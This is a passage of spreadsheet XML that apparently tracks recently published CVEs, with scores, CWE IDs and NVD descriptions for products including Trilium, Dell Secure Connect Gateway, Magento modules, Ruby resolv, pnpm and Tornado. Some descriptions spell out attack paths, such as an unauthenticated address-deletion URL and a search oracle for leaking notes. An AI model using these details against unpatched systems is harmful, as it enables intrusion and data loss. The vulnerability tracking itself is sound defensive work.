      <c r="K498" s="5" t="inlineStr"/>
      <c r="L498" s="5" t="inlineStr"/>
      <c r="M498" s="5" t="inlineStr"/>
      <c r="N498" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O498" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P498" s="5" t="inlineStr"/>
      <c r="Q498" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-863</t>
        </is>
      </c>
      <c r="R498" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions up to and including 0.103.0, the public share-search endpoint does not enforce the per-note shareCredentials and shareHiddenFromTree controls, allowing an unauthenticated visitor to read the titles, tree paths, and content of protected shared notes. The endpoint authorizes only the ancestor note supplied in the request and then runs a full-text search across the entire published subtree, returning each matching note's title, share identifier, and hierarchical path without re-checking whether that individual note requires a share password or is hidden from the navigation tree. Because the search matches note content, an attacker can enumerate protected notes and use the endpoint as a boolean oracle that confirms arbitrary substrings, recovering the full contents of notes that should be gated behind a password. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="S498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77438</t>
        </is>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B499" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77465</t>
        </is>
      </c>
      <c r="D499" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E499" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F499" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G499" s="5" t="inlineStr"/>
      <c r="H499" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I499" s="5" t="inlineStr"/>
      <c r="J499" s="5" t="inlineStr"/>
      <c r="K499" s="5" t="inlineStr"/>
      <c r="L499" s="5" t="inlineStr"/>
      <c r="M499" s="5" t="inlineStr"/>
      <c r="N499" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O499" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P499" s="5" t="inlineStr"/>
      <c r="Q499" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="R499" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">toml-node </t>
        </is>
      </c>
      <c r="S499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77465</t>
        </is>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B500" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78490</t>
        </is>
      </c>
      <c r="D500" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E500" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F500" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G500" s="5" t="inlineStr"/>
      <c r="H500" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I500" s="5" t="inlineStr"/>
      <c r="J500" s="5" t="inlineStr"/>
      <c r="K500" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L500" s="5" t="inlineStr"/>
      <c r="M500" s="5" t="inlineStr"/>
      <c r="N500" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O500" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P500" s="5" t="inlineStr"/>
      <c r="Q500" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="R500" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Restriction of Excessive Authentication Attempts vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to client-side request forgery.</t>
        </is>
      </c>
      <c r="S500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78490</t>
        </is>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B501" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78543</t>
        </is>
      </c>
      <c r="D501" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E501" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F501" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G501" s="5" t="inlineStr"/>
      <c r="H501" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I501" s="5" t="inlineStr"/>
      <c r="J501" s="5" t="inlineStr"/>
      <c r="K501" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="L501" s="5" t="inlineStr"/>
      <c r="M501" s="5" t="inlineStr"/>
      <c r="N501" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O501" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P501" s="5" t="inlineStr"/>
      <c r="Q501" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="R501" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 could allow a remote attacker to cause a denial of service due to an infinite loop.</t>
        </is>
      </c>
      <c r="S501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78543</t>
        </is>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B502" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79323</t>
        </is>
      </c>
      <c r="D502" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E502" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F502" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G502" s="5" t="inlineStr"/>
      <c r="H502" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I502" s="5" t="inlineStr"/>
      <c r="J502" s="5" t="inlineStr"/>
      <c r="K502" s="5" t="inlineStr">
        <is>
          <t>mageplaza:magefan_blog</t>
        </is>
      </c>
      <c r="L502" s="5" t="inlineStr"/>
      <c r="M502" s="5" t="inlineStr"/>
      <c r="N502" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O502" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P502" s="5" t="inlineStr"/>
      <c r="Q502" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R502" s="5" t="inlineStr">
        <is>
          <t>Information disclosure in the blogComments GraphQL query in Magefan Blog GraphQL for Magento 2 (magefan/module-blog-graph-ql) through 2.2.1 allows remote unauthenticated attackers to obtain blog commenter email addresses and internal customer and admin identifiers via a POST request to /graphql.</t>
        </is>
      </c>
      <c r="S502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79323</t>
        </is>
      </c>
    </row>
    <row r="503">
      <c r="A503" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B503" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79324</t>
        </is>
      </c>
      <c r="D503" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E503" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F503" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G503" s="5" t="inlineStr"/>
      <c r="H503" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I503" s="5" t="inlineStr"/>
      <c r="J503" s="5" t="inlineStr"/>
      <c r="K503" s="5" t="inlineStr">
        <is>
          <t>mageplaza:gdpr</t>
        </is>
      </c>
      <c r="L503" s="5" t="inlineStr"/>
      <c r="M503" s="5" t="inlineStr"/>
      <c r="N503" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O503" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P503" s="5" t="inlineStr"/>
      <c r="Q503" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R503" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in the Address Delete controller in Mageplaza GDPR for Magento 2 (mageplaza/module-gdpr) through 4.2.9 allows remote unauthenticated attackers to delete any customer's saved address, and to erase all stored addresses by iterating the address id, via a GET request to /customer/address/delete/id/{id}. The controller extends the legacy Action class instead of AbstractAccount, so no authentication, ownership or form key check is enforced.</t>
        </is>
      </c>
      <c r="S503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79324</t>
        </is>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B504" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79390</t>
        </is>
      </c>
      <c r="D504" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E504" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F504" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G504" s="5" t="inlineStr"/>
      <c r="H504" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I504" s="5" t="inlineStr"/>
      <c r="J504" s="5" t="inlineStr"/>
      <c r="K504" s="5" t="inlineStr"/>
      <c r="L504" s="5" t="inlineStr"/>
      <c r="M504" s="5" t="inlineStr"/>
      <c r="N504" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O504" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P504" s="5" t="inlineStr"/>
      <c r="Q504" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R504" s="5" t="inlineStr">
        <is>
          <t>Trueview TI8161 6.0.23.4 is vulnerable to information disclosure due to the transmission of MQTT communications in plaintext over TCP port 1883. An unauthenticated attacker with access to the same network segment can intercept MQTT traffic and obtain sensitive device information and operational data, including device identifiers, message metadata, and control-related information.</t>
        </is>
      </c>
      <c r="S504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79390</t>
        </is>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B505" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79641</t>
        </is>
      </c>
      <c r="D505" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E505" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F505" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G505" s="5" t="inlineStr"/>
      <c r="H505" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I505" s="5" t="inlineStr"/>
      <c r="J505" s="5" t="inlineStr"/>
      <c r="K505" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L505" s="5" t="inlineStr"/>
      <c r="M505" s="5" t="inlineStr"/>
      <c r="N505" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O505" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P505" s="5" t="inlineStr"/>
      <c r="Q505" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R505"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elevation of privileges.</t>
        </is>
      </c>
      <c r="S505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79641</t>
        </is>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B506" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79734</t>
        </is>
      </c>
      <c r="D506" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E506" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F506" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G506" s="5" t="inlineStr"/>
      <c r="H506" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I506" s="5" t="inlineStr"/>
      <c r="J506" s="5" t="inlineStr"/>
      <c r="K506" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L506" s="5" t="inlineStr"/>
      <c r="M506" s="5" t="inlineStr"/>
      <c r="N506" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O506" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P506" s="5" t="inlineStr"/>
      <c r="Q506" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R506"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S506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79734</t>
        </is>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B507" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79738</t>
        </is>
      </c>
      <c r="D507" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E507" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F507" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G507" s="5" t="inlineStr"/>
      <c r="H507" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I507" s="5" t="inlineStr"/>
      <c r="J507" s="5" t="inlineStr"/>
      <c r="K507" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L507" s="5" t="inlineStr"/>
      <c r="M507" s="5" t="inlineStr"/>
      <c r="N507" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O507" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P507" s="5" t="inlineStr"/>
      <c r="Q507" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R507"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S507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79738</t>
        </is>
      </c>
    </row>
    <row r="508">
      <c r="A508" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B508" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79740</t>
        </is>
      </c>
      <c r="D508" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E508" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F508" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G508" s="5" t="inlineStr"/>
      <c r="H508" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I508" s="5" t="inlineStr"/>
      <c r="J508" s="5" t="inlineStr"/>
      <c r="K508" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L508" s="5" t="inlineStr"/>
      <c r="M508" s="5" t="inlineStr"/>
      <c r="N508" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O508" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P508" s="5" t="inlineStr"/>
      <c r="Q508" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R508"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S508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79740</t>
        </is>
      </c>
    </row>
    <row r="509">
      <c r="A509" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B509" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79950</t>
        </is>
      </c>
      <c r="D509" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E509" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F509" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G509" s="5" t="inlineStr"/>
      <c r="H509" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I509" s="5" t="inlineStr"/>
      <c r="J509" s="5" t="inlineStr"/>
      <c r="K509" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L509" s="5" t="inlineStr"/>
      <c r="M509" s="5" t="inlineStr"/>
      <c r="N509" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O509" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P509" s="5" t="inlineStr"/>
      <c r="Q509" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R50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S509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79950</t>
        </is>
      </c>
    </row>
    <row r="510">
      <c r="A510" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B510" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80123</t>
        </is>
      </c>
      <c r="D510" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E510" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F510" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G510" s="5" t="inlineStr"/>
      <c r="H510" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I510" s="5" t="inlineStr"/>
      <c r="J510" s="5" t="inlineStr"/>
      <c r="K510" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L510" s="5" t="inlineStr"/>
      <c r="M510" s="5" t="inlineStr"/>
      <c r="N510" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O510" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P510" s="5" t="inlineStr"/>
      <c r="Q510" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R510"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denial of service.</t>
        </is>
      </c>
      <c r="S510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80123</t>
        </is>
      </c>
    </row>
    <row r="511">
      <c r="A511" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B511" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80212</t>
        </is>
      </c>
      <c r="D511" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E511" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F511" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G511" s="5" t="inlineStr"/>
      <c r="H511" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I511" s="5" t="inlineStr"/>
      <c r="J511" s="5" t="inlineStr"/>
      <c r="K511" s="5" t="inlineStr"/>
      <c r="L511" s="5" t="inlineStr"/>
      <c r="M511" s="5" t="inlineStr"/>
      <c r="N511" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O511" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P511" s="5" t="inlineStr"/>
      <c r="Q511" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R511" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the resolv gem before 0.7.2 for Ruby. Resolv::DNS::Resource.get_class, Resolv::DNS::Resource::Generic.create, and Resolv::DNS::SvcParam::Generic.create generate a new class for each unknown DNS resource record (type, class) pair, or each unknown SvcParamKey, encountered while decoding a response. Each generated class was permanently registered both as a constant on Resource (or SvcParam::Generic) and as an entry in a class-lookup hash (ClassHash), and thus the class remained reachable through that constant after the response was discarded. Type and class are each 16-bit values, and thus an attacker controlling DNS responses (a spoofed response, or a malicious or hijacked upstream DNS server) has roughly 2^32 distinct (type, class) pairs to choose from. A single response of a few hundred kilobytes carrying tens of thousands of distinct unknown types permanently grows process memory by tens of megabytes; repeated responses accumulate without bound and are never reclaimed by garbage collection, because the constant keeps each class alive. Any code path that calls Resolv::DNS::Message.decode on attacker-influenced DNS responses is affected. resolv is a default gem, and thus this is reachable from a plain Ruby installation without any additional dependency.</t>
        </is>
      </c>
      <c r="S511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80212</t>
        </is>
      </c>
    </row>
    <row r="512">
      <c r="A512" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B512" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80924</t>
        </is>
      </c>
      <c r="D512" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E512" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F512" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G512" s="5" t="inlineStr"/>
      <c r="H512" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I512" s="5" t="inlineStr"/>
      <c r="J512" s="5" t="inlineStr"/>
      <c r="K512" s="5" t="inlineStr"/>
      <c r="L512" s="5" t="inlineStr"/>
      <c r="M512" s="5" t="inlineStr"/>
      <c r="N512" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O512" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P512" s="5" t="inlineStr"/>
      <c r="Q512" s="5" t="inlineStr"/>
      <c r="R512" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: krb5 - use kfree_sensitive() for derived key buffers
crypto_krb5_prepare_encryption() and crypto_krb5_prepare_checksum()
free the buffer holding the freshly derived keys with plain kfree(),
leaving the key material behind in the freed slab object.</t>
        </is>
      </c>
      <c r="S512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80924</t>
        </is>
      </c>
    </row>
    <row r="513">
      <c r="A513" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B513" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82393</t>
        </is>
      </c>
      <c r="D513" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E513" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F513" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G513" s="5" t="inlineStr"/>
      <c r="H513" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I513" s="5" t="inlineStr"/>
      <c r="J513" s="5" t="inlineStr"/>
      <c r="K513" s="5" t="inlineStr"/>
      <c r="L513" s="5" t="inlineStr"/>
      <c r="M513" s="5" t="inlineStr"/>
      <c r="N513" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O513" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P513" s="5" t="inlineStr"/>
      <c r="Q513" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73, CWE-94</t>
        </is>
      </c>
      <c r="R513" s="5" t="inlineStr">
        <is>
          <t>pnpm is a package manager. Prior to 10.34.5 and 11.11.0, pnpm accepts a scoped path traversal in a tarball dependency's package.json manifest name because pnpm11/resolving/npm-resolver/src/pickPackage.ts rejects slash characters only for unscoped names. During pnpm install, the unvalidated name reaches raw path joins in pnpm11/installing/deps-resolver/src/resolvePeers.ts, pnpm11/installing/deps-resolver/src/index.ts, and pnpm11/deps/graph-builder/src/lockfileToDepGraph.ts, causing package extraction outside node_modules and allowing attacker-controlled files to overwrite arbitrary filesystem paths even when --ignore-scripts is used. The overwrite can replace shell startup files, Git hooks, or installed package code and lead to code execution. This issue is fixed in versions 10.34.5, and 11.11.0.</t>
        </is>
      </c>
      <c r="S513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82393</t>
        </is>
      </c>
    </row>
    <row r="514">
      <c r="A514" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B514" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82397</t>
        </is>
      </c>
      <c r="D514" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E514" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F514" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G514" s="5" t="inlineStr"/>
      <c r="H514" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I514" s="5" t="inlineStr"/>
      <c r="J514" s="5" t="inlineStr"/>
      <c r="K514" s="5" t="inlineStr"/>
      <c r="L514" s="5" t="inlineStr"/>
      <c r="M514" s="5" t="inlineStr"/>
      <c r="N514" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O514" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P514" s="5" t="inlineStr"/>
      <c r="Q514" s="5" t="inlineStr">
        <is>
          <t>CWE-1284, CWE-400</t>
        </is>
      </c>
      <c r="R514" s="5" t="inlineStr">
        <is>
          <t>Tornado is a Python web framework and asynchronous networking library. Prior to 6.5.8, Tornado parses application/x-www-form-urlencoded request bodies with urllib.parse.parse_qs in tornado/escape.py without passing max_num_fields. RequestHandler._execute in tornado/web.py parses the body before handler dispatch through HTTPServerRequest._parse_body and parse_body_arguments in tornado/httputil.py, so an unauthenticated request body containing millions of separator-delimited fields can synchronously stall the single-threaded event loop and delay every connection. The body is bounded only by max_buffer_size, which defaults to 104857600 bytes. This issue is fixed in version 6.5.8.</t>
        </is>
      </c>
      <c r="S514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82397</t>
        </is>
      </c>
    </row>
    <row r="515">
      <c r="A515" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B515" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84374</t>
        </is>
      </c>
      <c r="D515" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E515" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F515" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
